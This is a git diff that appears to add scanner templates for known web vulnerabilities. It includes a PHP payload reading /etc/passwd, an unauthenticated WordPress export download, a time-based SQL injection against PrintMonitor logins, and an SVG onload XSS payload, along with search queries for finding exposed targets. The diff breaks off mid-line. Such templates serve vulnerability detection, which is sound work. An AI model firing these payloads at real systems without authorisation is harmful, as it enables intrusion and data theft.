diff --git a/helpers/payloads/wp-social-warfare-rce.txt b/helpers/payloads/wp-social-warfare-rce.txt
new file mode 100644
index 0000000000..b0b0564f84
--- /dev/null
+++ b/helpers/payloads/wp-social-warfare-rce.txt
@@ -0,0 +1 @@
+
system('cat /etc/passwd')
diff --git a/http/cves/2015/CVE-2015-20067.yaml b/http/cves/2015/CVE-2015-20067.yaml
new file mode 100644
index 0000000000..10fae655b1
--- /dev/null
+++ b/http/cves/2015/CVE-2015-20067.yaml
@@ -0,0 +1,40 @@
+id: CVE-2015-20067
+
+info:
+ name: WP Attachment Export < 0.2.4 - Unrestricted File Download
+ author: r3Y3r53
+ severity: high
+ description: |
+ The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress
+ powered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.
+ remediation: Fixed in 0.2.4
+ reference:
+ - https://wpscan.com/vulnerability/d1a9ed65-baf3-4c85-b077-1f37d8c7793a
+ - https://packetstormsecurity.com/files/132693/
+ - https://seclists.org/fulldisclosure/2015/Jul/73
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-20067
+ classification:
+ cve-id: CVE-2015-20067
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cwe-id: 862
+ metadata:
+ max-request: 2
+ verified: true
+ google-query: inurl:"/wp-content/plugins/wp-attachment-export/"
+ tags: cve,cve2015,wordpress,wp,wp-plugin,unauth,wp-attachment-export,wpscan
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true"
+ - "{{BaseURL}}/wp-admin/tools.php?content=&wp-attachment-export-download=true"
+
+ stop-at-first-match: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code == 200'
+ - 'contains(header, "text/xml")'
+ - 'contains_all(body, "title","wp:author_id","wp:author_email")'
+ condition: and
diff --git a/http/cves/2018/CVE-2018-7282.yaml b/http/cves/2018/CVE-2018-7282.yaml
new file mode 100644
index 0000000000..47987b4ab7
--- /dev/null
+++ b/http/cves/2018/CVE-2018-7282.yaml
@@ -0,0 +1,48 @@
+id: CVE-2018-7282
+
+info:
+ name: TITool PrintMonitor - Blind SQL Injection
+ author: theamanrawat
+ severity: critical
+ description: |
+ The username parameter of the TITool PrintMonitor solution during the login request is vulnerable to and/or time-based blind SQLi.
+ remediation: Upgrade to PM18.2.1.
+ reference:
+ - https://fenceposterror.github.io/cve-2018-7282.txt
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-7282
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2018-7282
+ cwe-id: CWE-89
+ cpe: cpe:2.3:a:titool:printmonitor:*:*:*:*:*:*:*:*
+ metadata:
+ verified: "true"
+ shodan-query: title:"PrintMonitor"
+ max-request: 1
+ vendor: titool
+ product": printmonitor
+ tags: cve,cve2018,sqli,printmonitor,unauth
+
+variables:
+ username: "{{rand_base(6)}}"
+ password: "{{rand_base(8)}}"
+
+http:
+ - raw:
+ - |
+ @timeout: 20s
+ POST /login.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ username={{username}}')+OR+4191=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(50000000/2))))--+vDwl&password={{password}}&language=en
+
+ host-redirects: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code == 200'
+ - 'contains(body, "PrintMonitor") && contains(header, "text/html")'
+ condition: and
diff --git a/http/cves/2019/CVE-2019-15829.yaml b/http/cves/2019/CVE-2019-15829.yaml
new file mode 100644
index 0000000000..bfd21878b7
--- /dev/null
+++ b/http/cves/2019/CVE-2019-15829.yaml
@@ -0,0 +1,44 @@
+id: CVE-2019-15829
+
+info:
+ name: Gallery Photoblocks < 1.1.43 - Cross-Site Scripting
+ author: r3Y3r53
+ severity: medium
+ description: |
+ The Gallery PhotoBlocks WordPress plugin was affected by an Authenticated Reflected XSS security vulnerability.
+ remediation: Fixed in 1.1.43
+ reference:
+ - https://wpscan.com/vulnerability/b8d1d88e-f2e5-4212-af34-c91f563f07b6/
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-15829
+ - https://wordpress.org/plugins/photoblocks-grid-gallery/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.8
+ cwe-id: CWE-79
+ metadata:
+ max-request: 2
+ verified: true
+ publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/"
+ tags: cve,cve2023,wp,wordpress,wp-plugin,photoblocks-gallery,xss,authenticated,wpscan
+
+http:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In
+
+ - |
+ GET /wp-admin/admin.php?page=photoblocks-edit&id=%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_2 == 200'
+ - 'contains(body_2, "